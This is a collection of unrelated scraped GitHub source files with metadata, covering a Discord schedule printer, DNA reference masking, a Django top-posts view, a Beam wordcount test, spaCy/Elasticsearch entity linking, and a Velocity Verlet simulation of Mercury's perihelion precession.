ts = int(dt.timestamp())
desc = race['desc']
if prev_date != dt.date():
day = dt.strftime('%A')
print('')
print(f'{day} <t:{ts}:d>')
prev_date = dt.date()
print(f'<t:{ts}:t> (<t:{ts}:R>) - {desc}')
if __name__ == '__main__':
main()
| pkdawson/workrobot | print_schedule.py | print_schedule.py | py | 717 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "ruamel.yaml.YAML",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromiso... |
70471621543 | # TODO : TRANSFORM INTO A CLASS AND CREATE A REPORT OF REGION TRIMMED
#~~~~~~~GLOBAL IMPORTS~~~~~~~#
# Standard library packages import
from os import remove, path
import gzip
from time import time
from sys import stdout
# Third party package import
from Bio import SeqIO
# Local library packages import
from pyDNA.Utilities import import_seq, file_basename, mkdir
from Blast import Blastn
#~~~~~~~MAIN METHODS~~~~~~~#
def mask ( subject_fasta,
hit_list,
ref_outdir="./references/",
ref_outname="masked_ref.fa",
compress_ouput=True ):
"""
Import a reference fasta sequence, Mask positions indicated by hits from a hit_list and write
the modified fasta sequence in a new file.
@param subject_fasta Fasta sequence of the subject to edit (can be gzipped)
@param hit_list List of hit objects. Hits need at least 3 fields named s_id, s_start and s_end
coresponding to the name of the sequence matched, and the hit start/end (0 based).
@param ref_outdir Directory where the masked reference will be created
@param ref_outname Name of the masked reference
@param compress_ouput If true the output will be gzipped
@return A path to the modified sequence if the hit list was valid.
"""
# Test if object the first object of hit_list have the require s_id, s_start and s_end fields
try:
a = hit_list[0].s_id
a = hit_list[0].s_start
a = hit_list[0].s_end
except IndexError:
print ("No hit found, The subject fasta file will not be edited")
return subject_fasta
except AttributeError as E:
print ("The list provided does not contain suitable hit object, The subject fasta file will not be edited")
return subject_fasta
# Initialize output folder
mkdir(ref_outdir)
# Initialize input fasta file
if subject_fasta[-2:].lower() == "gz":
in_handle = gzip.open(subject_fasta, "r")
else:
in_handle = open(subject_fasta, "r")
# Initialize output fasta file
if compress_ouput:
ref_path = path.join (ref_outdir, ref_outname+".gz")
out_handle = gzip.open(ref_path, 'w')
else:
ref_path = path.join (ref_outdir, ref_outname)
out_handle = open(ref_path, 'w')
# Generate a list of ref that will need to be modified
id_list = {hit.s_id:0 for hit in hit_list}.keys()
# Iterate over record in the subject fasta file
print ("Masking hit positions and writting a new reference for {} ".format(ref_outname))
i=j=0
start_time = time()
for record in SeqIO.parse(in_handle, "fasta"):
# Progress Marker
stdout.write("*")
stdout.flush()
# Check if the record is in the list of record to modify
if record.id in id_list:
i+=1
#~print ("Hit found in {}. Editing the sequence".format(record.id))
# Casting Seq type to MutableSeq Type to allow string editing
record.seq = record.seq.tomutable()
# For each hit in the list of hit found
for hit in hit_list:
if record.id == hit.s_id:
# For all position between start and end coordinates modify the base by N
for position in range (hit.s_start, hit.s_end):
record.seq[position]= 'n'
else:
j+=1
#~print ("No hit found in {}".format(record.id))
# Finally write the sequence modified or not
out_handle.write(record.format("fasta"))
print("")
# Report informations
print("{} sequence(s) from {} modified in {}s".format(i,ref_outname, round(time()-start_time),2))
# Close files and return the masked ref path
in_handle.close()
out_handle.close()
return ref_path
| a-slide/pyDNA | RefMasker.py | RefMasker.py | py | 3,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pyDNA.Utilities.mkdir",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "gzip.open",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numb... |
1239251599 | from django.shortcuts import render
from django.views.generic import View
from django.http import JsonResponse
from application.chart.models.chart import TopPosts_MH, TopPosts_WH, TopPosts_PVN, TopPosts_RW, TopPosts_BI, TopPosts_ROL, TopPosts_WE
class GetTopPosts(View):
def get(self, request):
models_map = {
"WH": TopPosts_WH,
"MH": TopPosts_MH,
"PVN": TopPosts_PVN,
"RW": TopPosts_RW,
"BI": TopPosts_BI,
"ROL": TopPosts_ROL,
"WE": TopPosts_WE
}
response = []
for brand, TopPosts in models_map.items():
for model in TopPosts.objects.all():
response.append(
dict(viral_unique = model.viral_unique,
unique = model.unique,
link = model.link))
response.sort(key = lambda post: post['viral_unique']/post['unique'])
response.reverse()
return JsonResponse(response[:3], safe=False) | jialinzou/DjangoDashboard | application/chart/views/get_top_posts.py | get_top_posts.py | py | 1,005 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "django.views.generic.View",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "application.chart.models.chart.TopPosts_WH",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "application.chart.models.chart.TopPosts_MH",
"line_number": 10,
"usage... |
43639712257 | import os
from hashlib import md5
from bson.objectid import ObjectId
import datetime as dt
import re
def all_files(path):
files = []
with os.scandir(path) as entries:
for entry in entries:
entry_path = os.path.abspath(entry)
if entry.is_file() and os.path.splitext(entry_path)[1] == '.xlsx':
file_hash = md5(entry_path.encode()).hexdigest()[:24]
files.append({'_id': ObjectId(file_hash), 'path': entry_path})
elif entry.is_dir():
files += all_files(entry_path)
return files
def week_dates(string):
dates = [date.split('-') for date in re.findall(r'\d+-\d+-\d+', string)]
week_start = [int(numeric_string) for numeric_string in dates[0]]
week_start = dt.datetime(year=week_start[2], month=week_start[0], day=week_start[1])
week_end = [int(numeric_string) for numeric_string in dates[1]]
week_end = dt.datetime(year=week_end[2], month=week_end[0], day=week_end[1])
return week_start, week_end
def test_week_dates():
week_start, week_end = week_dates('Week 31 (Q3) From: 07-31-2016 To: 08-06-2016')
assert week_start == dt.datetime(year=2016, month=7, day=31)
assert week_end == dt.datetime(year=2016, month=8, day=6)
if __name__ == '__main__':
test_week_dates()
| blry/docker-flask-mongodb-uwsgi-nginx | parser/project/utils.py | utils.py | py | 1,316 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "os.scandir",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.path.splitext",
"line_... |
21618567791 | from __future__ import absolute_import
import logging
import time
import unittest
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples import wordcount
from apache_beam.testing.pipeline_verifiers import FileChecksumMatcher
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_utils import delete_files
class WordCountIT(unittest.TestCase):
# Enable nose tests running in parallel
_multiprocess_can_split_ = True
# The default checksum is a SHA-1 hash generated from a sorted list of
# lines read from expected output. This value corresponds to the default
# input of WordCount example.
DEFAULT_CHECKSUM = '33535a832b7db6d78389759577d4ff495980b9c0'
@attr('IT')
def test_wordcount_it(self):
self._run_wordcount_it(wordcount.run)
@attr('IT', 'ValidatesContainer')
def test_wordcount_fnapi_it(self):
self._run_wordcount_it(wordcount.run, experiment='beam_fn_api')
def _run_wordcount_it(self, run_wordcount, **opts):
test_pipeline = TestPipeline(is_integration_test=True)
extra_opts = {}
# Set extra options to the pipeline for test purpose
test_output = '/'.join([
test_pipeline.get_option('output'),
str(int(time.time() * 1000)),
'results'
])
extra_opts['output'] = test_output
test_input = test_pipeline.get_option('input')
if test_input:
extra_opts['input'] = test_input
arg_sleep_secs = test_pipeline.get_option('sleep_secs')
sleep_secs = int(arg_sleep_secs) if arg_sleep_secs is not None else None
expect_checksum = (
test_pipeline.get_option('expect_checksum') or self.DEFAULT_CHECKSUM)
pipeline_verifiers = [
PipelineStateMatcher(),
FileChecksumMatcher(
test_output + '*-of-*', expect_checksum, sleep_secs)
]
extra_opts['on_success_matcher'] = all_of(*pipeline_verifiers)
extra_opts.update(opts)
# Register clean up before pipeline execution
self.addCleanup(delete_files, [test_output + '*'])
# Get pipeline options from command argument: --test-pipeline-options,
# and start pipeline job by calling pipeline main function.
run_wordcount(
test_pipeline.get_full_options_as_args(**extra_opts),
save_main_session=False)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| a0x8o/kafka | sdks/python/apache_beam/examples/wordcount_it_test.py | wordcount_it_test.py | py | 2,483 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.examples.wordcount.run",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.examples.wordcount",
"line_number": 29,
"usage_type": "name"
... |
9454038158 | # coding: utf-8
# Credits : https://gist.github.com/jason-w/4969476
from typing import List, Dict, Any
from mongoengine import (
Document,
ListField,
EmbeddedDocumentField,
DictField,
EmbeddedDocument,
FloatField,
DateTimeField,
ComplexDateTimeField,
IntField,
BooleanField,
ObjectIdField,
DecimalField,
StringField,
QuerySet
)
def query_to_dict(query_set: QuerySet) -> List[Dict[str, str]]:
"""Convert a query result into a list of each ouput document as dict.
Args:
query_set (QuerySet): the query result.
Returns:
List[Dict[str, str]]: output list of documents as dicts.
"""
return [mongo_to_dict(document) for document in query_set]
def mongo_to_dict(obj, exclude_fields: List[str] = []) -> Dict[str, str]:
"""Returns the Dict format of the Document instance given in parameter.
Args:
obj (Deferred): the document queried from database to convert into dict.
exclude_fields (List[str], optional): list of fields to exclude in the
output dict. Defaults to [].
Returns:
Dict[str, str]: output dict.
"""
return_data = list()
if obj is None:
return None
if isinstance(obj, Document):
return_data.append(("id",str(obj.id)))
for field_name in obj._fields:
if field_name in exclude_fields:
continue
if field_name in ("id",):
continue
data = obj._data[field_name]
if isinstance(obj._fields[field_name], ListField):
return_data.append((field_name, list_field_to_dict(data)))
elif isinstance(obj._fields[field_name], EmbeddedDocumentField):
return_data.append((field_name, mongo_to_dict(data,[])))
elif isinstance(obj._fields[field_name], DictField):
return_data.append((field_name, data))
else:
return_data.append(
(field_name, mongo_to_python_type(obj._fields[field_name],data))
)
return dict(return_data)
def list_field_to_dict(list_field: List) -> List[str]:
"""Converts mongo db output list fields as a list of str.
Args:
list_field (List): list to convert.
Returns:
List[str]: output list.
"""
return_data = []
for item in list_field:
if isinstance(item, EmbeddedDocument):
return_data.append(mongo_to_dict(item,[]))
else:
return_data.append(mongo_to_python_type(item,item))
return return_data
def mongo_to_python_type(field: str, data: Any):
"""Convert the field into str depending on the field type.
Args:
field (str): field type.
data (Any): Associated data to convert.
Returns:
str: data converted.
"""
if isinstance(field, DateTimeField):
return str(data.isoformat())
elif isinstance(field, ComplexDateTimeField):
return field.to_python(data).isoformat()
elif isinstance(field, StringField):
return str(data)
elif isinstance(field, FloatField):
return float(data)
elif isinstance(field, IntField):
return int(data)
elif isinstance(field, BooleanField):
return bool(data)
elif isinstance(field, ObjectIdField):
return str(data)
elif isinstance(field, DecimalField):
return data
else:
return str(data) | nicolasjlln/lbc-challenge | app/database/utils.py | utils.py | py | 3,396 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mongoengine.QuerySet",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_... |
23966001733 | # coding=utf-8
import pytest
from mockito import expect, mock, verify, verifyNoUnwantedInteractions, verifyStubbedInvocationsAreUsed, when
# noinspection PyProtectedMember
from elib_run._run import _run
@pytest.mark.parametrize(
'mute',
[True, False]
)
def test_exit(mute, caplog):
caplog.set_level(10, 'elib_run.process')
context = mock(
{
'mute': mute,
'process_output_as_str': 'dummy_output',
'process_logger': mock(),
}
)
when(context.process_logger).debug(...)
with pytest.raises(SystemExit):
_run._exit(context)
if mute:
assert 'dummy_output' in caplog.text
else:
assert '' == caplog.text
@pytest.mark.parametrize('return_code', (0, 1))
@pytest.mark.parametrize('mute', (True, False))
@pytest.mark.parametrize('failure_ok', (True, False))
def test_check_error(return_code, mute, failure_ok, caplog):
caplog.set_level(10)
context = mock(
{
'return_code': return_code,
'mute': mute,
'result_buffer': '',
'failure_ok': failure_ok,
'cmd_as_string': 'dummy_cmd',
'process_logger': mock(),
}
)
when(_run)._exit(context)
result = _run.check_error(context)
if return_code is 0:
if mute:
expected_buffer = f': success: {return_code}'
else:
expected_buffer = f'{context.cmd_as_string}: success: {context.return_code}'
assert expected_buffer in caplog.text
assert result is 0
else:
if mute:
expected_buffer = f': command failed: {context.return_code}'
else:
expected_buffer = f'{context.cmd_as_string}: command failed: {context.return_code}'
assert expected_buffer in caplog.text
assert repr(context) in caplog.text
if not failure_ok:
verify(_run)._exit(context)
else:
verify(_run, times=0)._exit(...)
@pytest.mark.parametrize(
'filters',
(None, ['some'], ['some', 'string'], 'some string')
)
def test_sanitize_filters(filters):
result = _run._sanitize_filters(filters)
if filters is None:
assert result is None
elif isinstance(filters, str):
assert [filters] == result
else:
assert result is filters
@pytest.mark.parametrize(
'filters',
([False], [None], [True], [1], [1.1], [['list']], [{'k': 'v'}], True, False, 1.1, 1, ('tuple',), {'k': 'v'})
)
def test_sanitize_filters_wrong_value(filters):
with pytest.raises(TypeError):
_run._sanitize_filters(filters)
def test_parse_exe_no_args():
when(_run).find_executable(...).thenReturn('dummy')
result = _run._parse_cmd('cmd')
assert 'dummy', '' == result
verifyStubbedInvocationsAreUsed()
def test_parse_exe_with_args():
when(_run).find_executable(...).thenReturn('dummy')
result = _run._parse_cmd('cmd')
assert 'dummy', ['some', 'args'] == result
verifyStubbedInvocationsAreUsed()
def test_parse_cmd_exe_not_found():
when(_run).find_executable(...).thenReturn(None)
with pytest.raises(_run.ExecutableNotFoundError):
_run._parse_cmd('dummy')
verifyStubbedInvocationsAreUsed()
@pytest.mark.parametrize(
'mute', (True, False)
)
@pytest.mark.windows
def test_run(mute):
expect(_run.RunContext).start_process()
expect(_run).monitor_running_process(...)
expect(_run).check_error(...)
_run.run('cmd', mute=mute)
verifyNoUnwantedInteractions()
| theendsofinvention/elib_run | test/test_run.py | test_run.py | py | 3,523 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mockito.mock",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "mockito.mock",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "mockito.when",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_numb... |
14838347473 | import re
import nltk
import spacy
from nltk import Tree
from nltk.corpus import brown
sentence = "A solution of piperidin-4-ol (100 mg, 0.989 mmol) and 3-((phenylsulfonyl)methylene)oxetane (prepared according to a published literature procedure: Wuitschik et al. J. Med. Chem. 53(8) 3227-3246, 2010, 416 mg, 1.977 mmol) in methanol (5 mL) was heated at 50° C. for 20 h. Solvent was evaporated in vacuo and the crude product was purified by flash chromatography on silica gel using an automated ISCO system (40 g column, eluting with 0-8% 2 N ammonia in methanol/dichloromethane). 1-(3-((phenylsulfonyl)methyl)oxetan-3-yl)piperidin-4-ol (300 mg) was obtained as a colorless oil. If the temperature exceed 64 degrees when heating methanol it will result in 3% decrease in the final products."
def clean_sentence(example):
cleaned_sentence = example
mmole_qnuatities = re.findall("(\d+\.\d* mmol)", cleaned_sentence)
for x in mmole_qnuatities:
cleaned_sentence = cleaned_sentence.replace(x, '')
return cleaned_sentence
sentence = clean_sentence(sentence)
def tok_format(tok, is_quantity=False, is_unit=False):
if is_quantity:
return "_".join([tok.orth_, "QNTTY"])
if is_unit:
return "_".join([tok.orth_, "UNIT"])
return "_".join([tok.orth_, tok.tag_])
def to_nltk_tree(node, is_quantity=False, is_unit=False):
if node.n_lefts + node.n_rights > 0:
if is_quantity:
return Tree(tok_format(node, is_quantity=True),
[to_nltk_tree(child) for child in node.children])
if node.text in units_list:
return Tree(tok_format(node, is_unit=True), [to_nltk_tree(child, is_quantity=True) for child in node.children])
return Tree(tok_format(node), [to_nltk_tree(child) for child in node.children])
else:
if is_quantity and node.text.isnumeric():
return Tree(tok_format(node, is_quantity=True),
[to_nltk_tree(child) for child in node.children])
return tok_format(node)
parser = spacy.load("en_core_web_sm")
doc = parser(' '.join(sentence.split()))
units_list = ['mg', 'g', 'gr', 'gram', 'grams', 'kg', 'milligrams', 'milligram', 'mmol', 'ml', 'mL', 'L', 'millilitre']
uni_tags = []
for sent in doc.sents:
for idx, token in enumerate(sent):
if token.text in units_list:
uni_tags.append((token.text, 'UNT'))
elif token.text.isnumeric() and idx < len(sent) - 1 and sent[idx + 1].text in units_list:
uni_tags.append((token.text, 'QNTY'))
else:
uni_tags.append((token.text, token.tag_))
# t0 = nltk.DefaultTagger('NN')
# t1 = nltk.UnigramTagger(uni_tags, backoff=t0)
[to_nltk_tree(sent.root).pretty_print() for sent in doc.sents]
# def tag_sentence(sentence):
# for word in se
| arrafmousa/generate_code | custom_tags.py | custom_tags.py | py | 2,826 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 38,
... |
72774806185 | from typing import Any, Dict, List, TypedDict
import torch as th
from tango.integrations.torch import DataCollator
from tango.integrations.transformers import Tokenizer
from dreambooth.steps.transform_data import PreprocessedExample
class BatchExample(TypedDict):
input_ids: th.Tensor
pixel_values: th.Tensor
@DataCollator.register("custom_collator")
class CustomCollator(DataCollator[PreprocessedExample]):
def __init__(self, tokenizer: Tokenizer, is_prior_preservation: bool) -> None:
super().__init__()
self.tokenizer = tokenizer
self.is_prior_preservation = is_prior_preservation
def __call__(self, items: List[PreprocessedExample]) -> BatchExample:
input_ids = [item["instance_prompt_ids"] for item in items]
pixel_values_list = [item["instance_images"] for item in items]
if self.is_prior_preservation:
input_ids += [item["class_prompt_ids"] for item in items] # type: ignore
pixel_values_list += [item["class_images"] for item in items] # type: ignore
pixel_values = th.stack(pixel_values_list)
pixel_values = pixel_values.to(memory_format=th.contiguous_format).float()
input_ids = self.tokenizer.pad(
{"input_ids": input_ids},
padding="max_length",
return_tensors="pt",
max_length=self.tokenizer.model_max_length,
).input_ids
batch: BatchExample = {
"input_ids": input_ids,
"pixel_values": pixel_values,
}
return batch
| shunk031/tango-dreambooth | dreambooth/integrations/torch/data_collator.py | data_collator.py | py | 1,556 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TypedDict",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.Tensor",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tango.integratio... |
39665406570 | import gzip
import sys
from SPARQLWrapper import SPARQLWrapper, JSON
import gzip
from bs4 import BeautifulSoup
import re
import spacy
from spacy import displacy
from collections import Counter
import en_core_web_md
import difflib
import requests
import json
from elasticsearch import Elasticsearch
nlp = en_core_web_md.load()
KEYNAME = "WARC-TREC-ID"
KEYHTML= "<!DOCTYPE html"
NER_type = ["DATE","TIME","CARDINAL","ORDINAL","QUANTITY","PERCENT","MONEY"] # ruled type list avoid
## format function for output
def label_process(label):
if len(label.split(" "))>1:
return label.title()
return label
## rule format function in NER
def entity_process(entity):
l = []
for X,Y in entity:
if "cancer" in X:
X = X.lower()
l.append((X,Y))
return l
## retrieve the text from HTML pages
## including text cleaning
def html_to_text(record):
html = ''
flag = 0
for line in record.splitlines():
if line.startswith(KEYHTML):
flag = 1
if flag == 1 :
html += line
realHTML = html.replace('\n', '<br>')
soup = BeautifulSoup(realHTML,features="html.parser")
for script in soup(["script", "style","aside"]):
script.extract()
## text cleaning
text = " ".join(re.split(r'[\n\t]+', soup.get_text()))
text = re.sub(r"\s+", " ", text)
text = re.sub("[^\u4e00-\u9fa5^\s\.\!\:\-\@\#\$\(\)\_\,\;\?^a-z^A-Z^0-9]","",text)
return text
## NER function using spaCy
def ner(text):
doc = nlp(text)
entity = [(X.text, X.label_) for X in doc.ents if X.label_ not in NER_type]
entity = list(set(entity))
entity = entity_process(entity)
return entity
## funtion of entity linking
## link the query result (wikidata url) with each entity
def entity_linking(entity):
entity_list = []
for e,_ in entity:
if es_search(e):
entity_list.append((e,es_search(e)))
return entity_list
## function that finds a most similar entity
def get_closest_word(es_query, es_dictionary):
try:
wl = difflib.get_close_matches(es_query, list(es_dictionary.keys()))
return wl[0]
except:
return list(es_dictionary.keys())[0]
### function that requests elasticsearch to get the candidate
def es_search(es_query):
def search(query):
e = Elasticsearch(["http://fs0.das5.cs.vu.nl:10010/"])
p = { "from" : 0, "size" : 20, "query" : { "query_string" : { "query" : query }}}
response = e.search(index="wikidata_en", body=json.dumps(p))
id_labels = {}
if response:
for hit in response['hits']['hits']:
label = hit['_source']['schema_name']
id = hit['_id']
id_labels.setdefault(id, set()).add(label)
return id_labels
d = {}
try:
for entity, labels in search(es_query.lower()).items():
d[list(labels)[0]] = entity
res = get_closest_word(es_query,d)
return d[res]
except Exception as e:
print(e)
return d
# The goal of this function process the webpage and returns a list of labels -> entity ID
def find_labels(payload):
if payload == '':
return
# The variable payload contains the source code of a webpage and some additional meta-data.
# We firt retrieve the ID of the webpage, which is indicated in a line that starts with KEYNAME.
# The ID is contained in the variable 'key'
# cheats = dict((line.split('\t', 2) for line in open('data/sample-labels-cheat.txt').read().splitlines()))
key = None
for line in payload.splitlines():
if line.startswith(KEYNAME):
key = line.split(': ')[1]
break
try:
# Problem 1: The webpage is typically encoded in HTML format.
# We should get rid of the HTML tags and retrieve the text. How can we do it?
text = html_to_text(payload)
# Problem 2: Let's assume that we found a way to retrieve the text from a webpage. How can we recognize the
# entities in the text?
entity = ner(text)
# Problem 3: We now have to disambiguate the entities in the text. For instance, let's assugme that we identified
# the entity "Michael Jordan". Which entity in Wikidata is the one that is referred to in the text?
result = entity_linking(entity)
for label, wikidata_id in result:
if key and label and wikidata_id:
yield key, label, wikidata_id
except:
pass
def split_records(stream):
payload = ''
for line in stream:
if line.strip() == "WARC/1.0":
yield payload
payload = ''
else:
payload += line
yield payload
if __name__ == '__main__':
import sys
try:
_, INPUT = sys.argv
except Exception as e:
print('Usage: python starter-code.py INPUT')
sys.exit(0)
with gzip.open(INPUT, 'rt', errors='ignore') as fo:
for record in split_records(fo):
for key, label, wikidata_id in find_labels(record):
# print(key + '\t' + label + '\t' + wikidata_id)
print(key + '\t' + label_process(label) + '\t' + f"{wikidata_id}")
| SummerXIATIAN/wdps_asg1_group27 | code_es.py | code_es.py | py | 5,220 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "en_core_web_md.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_num... |
35798383779 |
from time import perf_counter
import numpy as np
import matplotlib.pyplot as plt
#The program uses the Velocity Verlet method to simulate the
#perihelion percession of Mercury over TT years divided into n
#time steps. In order to avoid problems with insuficient compter
#memory, one year at the time is simulated. When one year is simulated,
#the progtam finds the positions of Mercury closest to the Sun that current year.
#The initial conditions for next year to be simulated are extracted from the last time
#step in the current year simulated.
#The Velocity Verlet method.
def VelocityVerlet(f,x0,vx0,y0,vy0,t0,dt,n):
#Time vector t[0],t[1],t[2],......,t[n]
t = np.zeros(n+1)
#Vector for p for x and y component of position
#Vector v for x and y component of speed
p = np.zeros([n+1,2])
v = np.zeros([n+1,2])
#Initial values for position and speed when t = t[0],
#and for time
p[0,:] = np.array([x0,y0])
v[0,:] = np.array([vx0,vy0])
t[0] = t0
#Starting timer
#The Velocity Verlet method
#c1 = time.time()
start = perf_counter()
for k in range(n):
fpk = f(p,v,k)
t[k+1] = t[k] + dt
p[k+1] = p[k] + dt*v[k] + 0.5*dt**2*fpk
v[k+1] = v[k] + 0.5*dt*(f(p,v,k+1) + fpk)
#cpu time while it is running the Velocity Verlet algorithm.
slutt = perf_counter()
cpu_vv = slutt - start
#cpu_vv = time.time() - c1
return t,p,v, cpu_vv
#The acceleration needed to find the velocity components in the
#Velocity Verlet methodUnit AU/(year)**2 (AU - Astronomical Unit)
#The accelaration is without the general relativistic correction,
#that is acceleration derived from Newtons classical law of gravitation.
def f_N(p,v,k):
f = np.array([-4*np.pi**2*p[k,0],-4*np.pi**2*p[k,1]])
r = np.sqrt(p[k,0]**2 + p[k,1]**2)
f = f/float(r**3)
return f
#The acceleration needed to find
#the position and velocity components in the Velocity Verlet
#method. Unit AU/(year)**2 (AU - Astronomical Unit).
#The general relativistic correction is included.
#c is the speed of light with unit [AU/Year]
def f_E(p,v,k):
c = 63241.077084266275
l = np.abs(p[k,0]*v[k,1]-p[k,1]*v[k,0])
r = np.sqrt(p[k,0]**2 + p[k,1]**2)
f = np.array([-4*np.pi**2*(1.0+3.0*l**2/(r**2*c**2))*p[k,0],-4*np.pi**2*(1.0+3.0*l**2/(r**2*c**2))*p[k,1]])
f = f/float(r**3)
return f
#Initial time t0
t0 = 0
#Initial position of Mercury: x0 = 0.3075 AU and y0 = 0 AU
x0_N = 0.3075
y0_N = 0
x0_E = 0.3075
y0_E = 0
#Initial velocity of Mercury: vx0 = 0 AU/year and vy0 = 12.44 AU/year
vx0_N = 0
vy0_N = 12.44
vx0_E = 0
vy0_E = 12.44
#Numer of years TT,total number of time steps n ans time step length
TT = 100
n = 2*(10**6)
dt = (TT - t0)/float(n*TT)
#Initializon of lists
perihel_N = []
#kvalue_N = []
perihel_E = []
#kvalue_E = []
tt_N = []
tt_E = []
x_N = []
y_N = []
x_E = []
y_E = []
#Initializon of year counter to be printed on screen
#during simulation
teller = 0
#Simulation of one year at the time, without relativistic correction
#(index N for Newton) and with relativistic correction (index E for Einstein)
for i in range(TT):
T = 1 + i
[t,pvv_N,vvv_N,cpu_vv_N] = VelocityVerlet(f_N,x0_N,vx0_N,y0_N,vy0_N,t0,dt,n)
[t,pvv_E,vvv_E,cpu_vv_E] = VelocityVerlet(f_E,x0_E,vx0_E,y0_E,vy0_E,t0,dt,n)
#Initial conditions for simulation of next year
t0 = t[n]
x0_N = pvv_N[n,0]
y0_N = pvv_N[n,1]
x0_E = pvv_E[n,0]
y0_E = pvv_E[n,1]
vx0_N = vvv_N[n,0]
vy0_N = vvv_N[n,1]
vx0_E = vvv_E[n,0]
vy0_E = vvv_E[n,1]
#Distances between Sun and Mercury (no relativistic correction)
rr_N = np.sqrt(pvv_N[:,0]**2 + pvv_N[:,1]**2)
#rmax_N = np.max(rr_N)
#rmin_N = np.min(rr_N)
#Distances between Sun and Mercury (relativistic correction included)
rr_E = np.sqrt(pvv_E[:,0]**2 + pvv_E[:,1]**2)
#rmax_E = np.max(rr_E)
#rmin_E = np.min(rr_E)
#Finding the positions and corresponding time steps where Mecury is
#closest to the Sun (no relativistic correction)
for k in range(1,np.size(rr_N)-1):
if rr_N[k] < rr_N[k-1] and rr_N[k] < rr_N[k+1]:
perihel_N.append(rr_N[k])
tt_N.append(t[k])
x_N.append(pvv_N[k,0])
y_N.append(pvv_N[k,1])
#kvalue_N.append(k)
#perihel_N = np.asarray(perihel_N)
#kvalue_N = np.asarray(kvalue_N)
#--------------------------------
#Finding the positions and corresponding time steps where Mecury is
#closest to the Sun (relativistic correction included)
for k in range(1,np.size(rr_E)-1):
if rr_E[k] < rr_E[k-1] and rr_E[k] < rr_E[k+1]:
perihel_E.append(rr_E[k])
tt_E.append(t[k])
x_E.append(pvv_E[k,0])
y_E.append(pvv_E[k,1])
#kvalue_E.append(k)
#Printing curret year just simulated on screen.
teller = teller + 1
print(teller)
#--------------------------------------------
#Making arrays of lists with results from TT years of
#simulation
tt_N = np.asarray(tt_N)
x_N = np.asarray(x_N)
y_N = np.asarray(y_N)
perihel_N = np.asarray(perihel_N)
tt_E = np.asarray(tt_E)
x_E = np.asarray(x_E)
y_E = np.asarray(y_E)
perihel_E = np.asarray(perihel_E)
#print(np.size(tt_N))
#x_N = np.zeros(np.size(kvalue_N))
#y_N = np.zeros(np.size(kvalue_N))
#theta_N = np.zeros(np.size(kvalue_N))
#for k in range(np.size(kvalue_N)):
# x_N[k] = pvv_N[kvalue_N[k],0]
# y_N[k] = pvv_N[kvalue_N[k],1]
# theta_N[k] = np.arctan(y_N[k]/x_N[k])
#------------------------------------------
#x_E = np.zeros(np.size(kvalue_E))
#y_E = np.zeros(np.size(kvalue_E))
#theta_E = np.zeros(np.size(kvalue_E))
#for k in range(np.size(kvalue_E)):
# x_E[k] = pvv_E[kvalue_E[k],0]
# y_E[k] = pvv_E[kvalue_E[k],1]
# theta_E[k] = np.arctan(y_E[k]/x_E[k])
#print(np.size(tt_N))
#print(np.size(tt_E))
#print(np.size(x_N))
#print(np.size(y_N))
#print(np.size(x_E))
#print(np.size(y_E))
#Writing final results to file
outfile = open('data5g_N.txt','w')
for i in range(np.size(x_N)):
outfile.write("""%2.12f %2.12f %2.12f""" % (tt_N[i], x_N[i], y_N[i]))
outfile.write('\n')
outfile.close()
outfile = open('data5g_E.txt','w')
for i in range(np.size(x_E)):
outfile.write("""%2.12f %2.12f %2.12f""" % (tt_E[i], x_E[i], y_E[i]))
outfile.write('\n')
outfile.close()
#Plotting Mercurys orbit after TT rears of simulation
#(both with and without relativistic correction) as
#a check that they look okay.
plott1 = 'ja'
#Plot of earth's position if plott = 'ja'
if plott1 == 'ja':
fig = plt.figure()
ax = plt.subplot(111)
ax.plot(pvv_N[:,0], pvv_N[:,1],'b',label = 'Newton')
ax.plot(pvv_E[:,0], pvv_E[:,1],'r',label = 'Einstein')
#Increase margins on axes
ax.set_xmargin(0.1)
ax.axis('equal')
#plt.axis('equal')
